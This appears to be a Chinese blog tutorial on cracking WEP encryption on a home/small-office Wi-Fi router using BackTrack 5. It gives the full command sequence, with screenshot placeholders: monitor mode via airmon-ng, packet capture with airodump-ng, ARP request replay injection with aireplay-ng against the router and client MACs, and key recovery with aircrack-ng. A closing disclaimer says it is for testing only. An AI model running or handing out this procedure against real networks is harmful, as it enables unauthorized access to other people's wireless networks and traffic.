今天两点闭的眼,然后又做了一个非常非常贱的梦,实在受不鸟了,九点多就醒了……表示压力很大,有人为何总是缠着xqz,就是梦中也不放过xqz,而xqz就知道犯贱……不说了,直接正题:

       ·1.需要的工具:vm,bt4/5(我用bt5),本本,usb网卡(如果不用虚拟机,usb网卡就不用了,我用的是tp-link322g+);    

        2.步骤:

(1)bt5虚拟机的安装:这个不多说,用vm虚拟机加载bt5的iso文件,进行安装即可,介于vm没有针对bt5的设置,这里建议采用linux的ubuntu版本(因为我发现bt5更新的时候用的就是ubuntu的源)。或者直接下载bt5的vm文件,在vm里打开就行了,省去了安装步骤。从这个地址可以下载bt5的vm文件的种子:http://www.everbox.com/f/AqdfQ1F56WGHMf8B8NkOF3bInA

(2)打开虚拟机,插上usb网卡:

在虚拟机命令行接口下键入:ifconfig -a  以显示所有网卡(包括未激活的),看看是否usb网卡被虚拟机识别,若识别,则如下图:

 

 

soho路由器wep加密的破解_第1张图片


 

    下面对网卡进行激活:ifconfig wlan0 up  激活后,可以只用ifconfig命令就可以看到wlan0.

 

      

 

soho路由器wep加密的破解_第2张图片

       接着进行对网卡的监听,这里采用airmon-ng工具,键入airmon-ng start wlan0,成功后如下:



 

soho路由器wep加密的破解_第3张图片

划线部分为网卡的芯片类型,红圈为把网卡设为监听状态后,所虚拟出的一块网卡。

 

下面 探测无线网络,抓去无线数据包:命令 airodump-ng mon0 如图:


 

soho路由器wep加密的破解_第4张图片

我们可以看到无线路由器的mac地址,该无线网络(tp-link——shark)所处的信道(ch=6),连接该网络的客户端的mac地址等等。

我们把路由的mac(54开头的 那个)和客户端的mac(00:1F:3c……)复制下来,以备用

 

 

下面命令:airodump-ng --ivs -w shark -c 6 mon0

--ivs是为了过滤出ivs文件;

-w后跟要保存的文件名,这里是shark,如果是第一次破解,那么生成的文件名应该是shark-01.ivs

-c后跟所处信道,这里是第六信道;

mon0为所进行监听的网卡

 

成功后如下图:


 

soho路由器wep加密的破解_第5张图片

红圈部分为我们抓的无线数据包数量,由于客户机和路由器之间的流量交互较少所以data的上升非常慢,而破解一个web密码往往需要抓去至少1w个data,所以为了强制其大流量交互,这里我们需要进行一次arp***,用***主机(你的本本)向被***者(客户机和无线路由)发送大量的arprequest报文以迫使其产生大量的arp回包,快速增加抓包的速度!

命令:aireplay-ng -3 -b 路由的mac -h 客户的mac mon0(这里建议另开一个命令窗口)

-3 表示采用arprequest***

-b后跟路由的mac

-h后跟客户的mac

成功后如图:


 

soho路由器wep加密的破解_第6张图片

此时若观察data 会发现其数量飞速上升。

 

接着对生成的ivs文件进行分析,计算出密码:

命令:aircrack-ng shark-01.ivs

成功后如图:


 

soho路由器wep加密的破解_第7张图片

 

看到了“key found!”吗?注意红圈部分就是所破解出来的密码哦!!。。。。

 

 

说明:

该方式只针对对wep加密的无线网络,对于wap加密的无限网络,破解过程类似,但是要自己制作密码字典,进行暴力破解,这里暂时不介绍该种方式;

该方式只建议用于测试!若借此进行非法操作,后果自负!!;

以上内容,并非完全原创,为了尊重技术,也为了尊重bt5的开发者,特此说明!